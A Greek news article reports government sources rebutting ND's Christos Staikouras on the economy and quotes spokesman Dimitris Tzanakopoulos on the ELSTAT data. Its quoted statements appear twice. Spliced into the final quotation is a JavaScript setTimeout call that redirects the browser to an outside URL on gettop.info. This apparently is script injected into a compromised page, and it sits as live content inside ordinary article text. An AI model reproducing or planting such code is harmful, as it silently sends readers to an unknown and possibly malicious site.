Πηγές Μαξίμου: Ο κ. Σταϊκούρας συνεχίζει τη ρητορική του «success story» της κυβέρνησης Σαμαρά-Βενιζέλου

0
3

 

Την απάντησή τους στη ΝΔ και τον συντονιστή της Οικονομικών Υποθέσεων, Χρήστο Σταϊκούρα, δίνουν πηγές του Μεγάρου Μαξίμου σχετικά με τις κατηγορίες που εξέφρασε εκείνος με δήλωσή του ότι «η κυβέρνηση ΣΥΡΙΖΑ- ΑΝΕΛ παρέλαβε την οικονομία στον «1ο όροφο», την έριξε στο «υπόγειο», και σήμερα πανηγυρίζει που προσπαθεί να την ανεβάσει στο «ισόγειο»».

Όπως σημειώνουν οι πηγές της κυβέρνησης «ο κ. Σταϊκούρας συνεχίζει τη φαντασιόπληκτη ρητορική του success story της κυβέρνησης Σαμαρά-Βενιζέλου». Επίσης τον κατηγορούν ότι ούτε εκείνος «ούτε και ο συνεχιστής της πολιτικής Σαμαρά- Βενιζέλου, ο κ. Μητσοτάκης δεν πρόκειται να ομολογήσουν τις αλήθειες γύρω από τα οικονομικοπολιτικά δεδομένα από το 2014 και έπειτα«.

Ειδικότερα, οι πηγές της κυβέρνησης σημειώνουν ότι «η ΝΔ εξακολουθεί να μην θέλει να καταλάβει ότι καμιά κυβέρνηση ΣΥΡΙΖΑ δεν πανηγυρίζει για την πορεία της οικονομίας, παρόλο που τα στοιχεία της ΕΛΣΤΑΤ «ξεπερνούν και τις πιο αισιόδοξες προβλέψεις»».

Ως προς αυτό, παραπέμπουν στις σχετικές δηλώσεις του υπουργού Επικρατείας και κυβερνητικού εκπροσώπου Δημήτρη Τζανακόπουλου, στην ενημέρωση των πολιτικών συντακτών, ο οποίος τόνιζε: «Σε καμία περίπτωση δεν πανηγυρίζουμε γι’ αυτά τα θετικά στοιχεία.

Γνωρίζουμε πολύ καλά ότι οι αριθμοί δεν αντανακλούν την εικόνα της κοινωνίας που ακόμη στενάζει εξαιτίας της πολυετούς ύφεσης και της λιτότητας. Σημειώνουμε, όμως, ότι η σελίδα αλλάζει και μπορούμε πλέον να είμαστε πολύ πιο αισιόδοξοι για το μέλλον. Στόχος μας είναι η θετική αυτή πορεία να συνεχιστεί και να αρχίσει να επηρεάζει θετικά την ίδια την καθημερινότητα των πολιτών. Και αυτό μπορεί να γίνει μόνο με μια πολιτική στήριξης της αγοραστικής δύναμης των εργαζόμενων αλλά και αποφασιστικότητας για την καταπολέμηση της ανεργίας».

Και, σε σχετική ερώτηση δημοσιογράφου, επανέλαβε ότι «Δεν πανηγυρίζουμε επ’ ουδενί για τα στοιχεία αυτά […] Γνωρίζουμε πως οι αριθμοί δεν μετατρέπονται σε κοινωνική ευημερία άμεσα. Παρόλα αυτά είναι ένα θετικό στοιχείο, το οποίο το αναγνωρίζουμε και έρχεται σε πλήρη αντίθεση με την καταστροφολογική ρητορική της ΝΔ όλη την τελευταία περίοδο. Από κει και πέρα, σας ξαναλέω: Τα στοιχεία και οι αριθμοί είναι εκεί, είναι πραγματικά, αλλά, η δική μας δουλειά είναι οι αριθμοί αυτοί να μπορέσουν να αντανακλώνται και στην καθημερινότητα των πολιτών. Αυτό είναι το κομβικό ζήτημα γι’ αυτή την κυβέρνηση και δεν το παραβλέπουμε».

Ο υπουργός Επικρατείας και κυβερνητικός εκπρόσωπος Δ. Τζανακόπουλος, και χθες, στην ενημέρωση των πολιτικών συντακτών τόνιζε:

«Σε καμία περίπτωση δεν πανηγυρίζουμε γι’ αυτά τα θετικά στοιχεία. Γνωρίζουμε πολύ καλά ότι οι αριθμοί δεν αντανακλούν την εικόνα της κοινωνίας που ακόμη στενάζει εξαιτίας της πολυετούς ύφεσης και της λιτότητας. Σημειώνουμε, όμως, ότι η σελίδα αλλάζει και μπορούμε πλέον να είμαστε πολύ πιο αισιόδοξοι για το μέλλον. Στόχος μας είναι η θετική αυτή πορεία να συνεχιστεί και να αρχίσει να επηρεάζει θετικά την ίδια την καθημερινότητα των πολιτών. Και αυτό μπορεί να γίνει μόνο με μια πολιτική στήριξης της αγοραστικής δύναμης των εργαζόμενων αλλά και αποφασιστικότητας για την καταπολέμηση της ανεργίας«.

Και, σε σχετική ερώτηση δημοσιογράφου, επανέλαβε ότι

«Δεν πανηγυρίζουμε επ’ ουδενί για τα στοιχεία αυτά […] Γνωρίζουμε πως οι αριθμοί δεν μετατρέπονται σε κοινωνική ευημερία άμεσα. Παρόλα αυτά είναι ένα θετικό στοιχείο, το οποίο το αναγνωρίζουμε και έρχεται σε πλήρη αντίθεση με την καταστροφολογική ρητορική της ΝΔ όλη την τελευταία περίοδο. Από κει και πέρα, σας ξαναλέω: Τα στοιχεία και οι αριθμοί είναι εκεί, είναι πραγματικά, αλλά, η δική μας δουλειά είναι οι αριθμοί αυτοί να μπορέσουν να αντανακλώνται και στην καθημερινότητα των πολιτών. Αυτό είναι το κομβικό ζήτημα γι’ αυτή την κυβέρνηση και δεν το παραβλέπουμε«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here